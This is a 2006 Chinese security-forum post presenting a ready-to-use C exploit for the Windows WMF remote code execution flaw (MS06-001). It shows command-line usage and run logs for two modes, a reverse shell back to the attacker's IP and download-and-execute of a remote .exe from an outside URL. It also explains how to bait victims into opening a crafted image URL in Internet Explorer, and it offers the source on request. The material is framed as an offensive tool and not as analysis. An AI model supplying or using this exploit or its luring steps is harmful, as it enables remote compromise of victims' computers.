通行证│用户名: 密码: 验证码: 验证码,看不清楚?请点击刷新验证码 电信网通铁通移动   在线
文章搜索:
热门搜索:红客 黑鹰 红客技术 安全动画 红客培训
首页 文章 软件 动画 资源 励志 论坛 邮箱 会员 军事 科技 博客 爱心红客 最近更新 800g资源
 业内新闻 漏洞公告 病毒公告 电脑知识 网络知识 菜鸟入门 攻防教程 黑客攻防 安全编程 工具使用 综合安全 个人安全 安全相关 Q Q安全 原创精华 红客人物 站内事件
您现在的位置: 爱国者安全网 >> 文章类 >> 原创精华 >> 文章正文
ms0601wmf文件远程执行代码利用程序无敌版
责任编辑:古典辣M°   更新日期:2006-1-13
 
好久没发原创了,再不发就要被冰血那丫给SM了:-(wmf文件格式的漏洞出了这么久了,最近才有时间研究一下。。。想必这个漏洞也吸引了很多人的眼球吧。。。metasploit果然牛啊,推出的exploit总是那么及时而又有效。。。。闲着没事,就改成C版的了,程序运行帮助如下:
QUOTE:

Microsoft Windows / Internet Explorer WMF Remote Code Execution Exploit

                    P.O.C VERSION

                  codez by superlone@EST

Usage:
    wmfexp

shell type <====> 1:
          <====>

e.g: wmfexp 1 192.168.1.111 8080 192.168.1.111 1314

shell type <====> 2:
          <====>

e.g: wmfexp 2 192.168.1.111 8080 http://www.eviloctal.com/superlone.exe

^_^ SHOW my love to LiuHui,for EVER and EVER!!!!


一看就明白的,不用我多说了吧?反向溢出的实例如下:
QUOTE:


E:\temp\Release>wmfexp 1 192.168.1.111 8080 192.168.1.111 1314
Microsoft Windows / Internet Explorer WMF Remote Code Execution Exploit

                    P.O.C VERSION
                written by superlone@EST

^_^MY love goes to my wife for EVER and EVER

^_^binding 192.168.1.111 on port 8080 with socket ...DONE!
^_^waiting for connection of ANY.WMF request ...GOT IT!
^_^connection received from 192.168.1.3 on port 42249
^_^generating payload ...DONE!
^_^sending crafted data to the remote host 192.168.1.3 ...DONE!
^_^do i work well?-)


结果看附图。


下载执行的实例如下:

QUOTE:


E:\temp\Release>wmfexp 2 192.168.1.111 8080 http://www.huibian.com/wmf/wmf.exe
Microsoft Windows / Internet Explorer WMF Remote Code Execution Exploit

                    P.O.C VERSION
                written by superlone@EST

^_^MY love goes to my wife for EVER and EVER

^_^binding 192.168.1.111 on port 8080 with socket ...DONE!
^_^waiting for connection of ANY.WMF request ...GOT IT!
^_^connection received from 192.168.1.3 on port 43529
^_^generating payload ...DONE!
^_^sending crafted data to the remote host 192.168.1.3 ...DONE!
^_^do i work well?-)





结果如附图。。。

由于是POC版所以我没有优化shellcode,等过些时日公布出代码后大家可以自行更改!!!


PS
我在sp2上也是测试成功的,不知道你们知道测试方法不?8080端口是本地绑定的端口,伪装成http server的,如果这个端口已经有程序占用程序就会出现“...*_* error:bind operation fail
ed”,没使用端口复用。。。
另外这个漏洞程序的利用是不是还有很多朋友不明白啊,当程序出现“^_^waiting for connection of ANY.WMF request ...”时,说明exploit已经成功运行并已经监听在你设置的端口上了(比如8080),这个时候需要你发挥你的想像力想办法让对方在IE中访问你的URL,不知道你的url吗?怪我忘了跟大家说了,如果对方访问这样的url:
http://你的IP:你监听的端口/any.wmf

就会中招,其中你的IP不用说了吧?外网使用的话肯定要有公网IP的。。。。你监听的端口就是伪装的http server的端口,在例子中是8080端口。any.wmf是任意的文件,随便你写吧,但后缀必须是以下中的一个:
dib emf wmf bmp tiff
比如这样的url:
http://192.168.1.111:8080/mylove.tiff
只要有漏洞的主机用IE打开上面的这个URL就会中标了。。。。另外,我上面测试有个windows按钮专家的截图,那个就是在xp sp1的机器上访问我的url后成功下载执行的。。。

明白了吗?我的程序提供了反向连接和下载执行两个功能,推荐你使用下载执行。。。为什么?你丫找抽~~~
再要说明,发布的这个程序是P.O.C版本,因此没有对http请求包进行分析,比如判断目标机器是不是xp以上的系统等等。。。需要源代码的可以找我要,或者过几天就公布了。。。
还不明白的我就没办法了,虎子说我的语言表达能力很强的。。。。

注意:测试url后使用的后缀名只可以是以下几个中的一个:
dib emf wmf bmp tiff



  • 上一篇文章:
  • 下一篇文章:
  • 最近更新
    固顶文章 爱国者安全网2007年度优秀版主评选
    普通文章 瑞星公司01月11日发布 每日计算机病毒及木马播报
    普通文章 破解博彩神助(专注彩票) V2.8.01
    推荐文章 推荐:跨站脚本执行漏洞代码的六点思路
    普通文章 Windows系统下的远程堆栈溢出 实战篇
    普通文章 Windows系统下的远程堆栈溢出 原理篇
    普通文章 MsSQLServer是如何加密口令的
    普通文章 浅谈国内的渗透评估过程
    普通文章 Dvbbs8.1 0DAY(通杀Access和mssql版本)
    普通文章 微软:我们的代码比赛门铁克更安全
    热门文章
    普通文章REAL蛀虫利用播放器漏洞下载恶意程序
    普通文章李彦宏:中国要在互联网领域逐渐超越美国
    普通文章马云:阿里巴巴的成功是一个生态链的成功
    普通文章Ingres用户认证非授权访问漏洞
    普通文章TCPreen FD_SET()函数远程栈溢出漏洞
    普通文章Winace UUE文件解压堆溢出漏洞
    普通文章Pclxav木马猎手第一代特征码引擎源代码
    普通文章IE收藏夹管理小精灵算法分析
    普通文章Extra Drive Pro算法分析历程
    普通文章雨过天晴自我注册
    精彩专题